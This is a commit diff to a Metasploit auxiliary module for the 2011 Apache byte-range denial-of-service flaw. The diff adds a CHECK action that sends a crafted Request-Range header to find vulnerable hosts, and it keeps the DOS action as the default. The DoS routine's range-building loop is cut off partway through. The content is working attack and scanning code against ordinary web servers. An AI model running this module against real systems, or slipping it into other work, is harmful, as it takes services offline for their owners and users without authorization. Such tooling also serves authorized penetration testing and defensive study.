added CHECK functionality to the existing module

2012-12-13 16:54:50 +01:00 · 2012-12-13 16:54:50 +01:00 · a48c14124b
parent 23d0ffa3ab
commit a48c14124b
1 changed files with 66 additions and 4 deletions
--- a/modules/auxiliary/dos/http/apache_range_dos.rb
+++ b/modules/auxiliary/dos/http/apache_range_dos.rb
@ -14,6 +14,10 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary

 	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::WmapScanFile
+	include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::Report
 	include Msf::Auxiliary::Dos

 	def initialize(info = {})
@ -28,7 +32,8 @@ class Metasploit3 < Msf::Auxiliary
 			'Author'         =>
 				[
 					'Kingcope', #original discoverer
-					'Masashi Fujiwara' #metasploit module
+					'Masashi Fujiwara', #metasploit module
+					'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
 				],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
@ -39,17 +44,74 @@ class Metasploit3 < Msf::Auxiliary
 					[ 'EDB', '17696'],
 					[ 'OSVDB', '74721' ],
 				],
-			'DisclosureDate' => 'Aug 19 2011'))
+			'DisclosureDate' => 'Aug 19 2011',
+
+		'Actions'  =>
+			[
+				['DOS'],
+				['CHECK']
+			],
+		'DefaultAction' => 'DOS'
+
+		))

 		register_options(
 			[
 				Opt::RPORT(80),
 				OptString.new('URI', [ true,  "The request URI", '/']),
-				OptInt.new('RLIMIT', [ true,  "Number of requests to send", 50])
+				OptInt.new('RLIMIT', [ true,  "Number of requests to send",50]),
+				OptString.new('ACTION', [true, "DOS or CHECK", "DOS"])
 			], self.class)
 	end

-	def run
+	def run_host(ip)
+
+	case action.name
+
+	when 'DOS'
+		conduct_dos()
+
+	when 'CHECK'
+		check_for_dos()
+	end
+
+	end
+
+	def check_for_dos()
+		path = datastore['URI']
+			begin
+				res = send_request_cgi({
+										'uri'           =>  path,
+										'method'        => 'HEAD',
+										'headers'       => { "HOST" => "Localhost", "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"} })
+
+				if (res and res.code == 206)
+					print_status("Response was #{res.code}")
+					print_status("Found Byte-Range Header DOS at #{path}")
+
+
+				report_note(
+					:host   => rhost,
+					:port   => rport,
+					:data   => "Apache Byte-Range DOS at #{path}"
+
+				)
+
+				else
+					print_status("NADA")
+			
+				end
+
+
+			rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			rescue ::Timeout::Error, ::Errno::EPIPE
+	end
+
+
+	end
+
+
+	def conduct_dos()
 		uri = datastore['URI']
 		ranges = ''
 		for i in (0..1299) do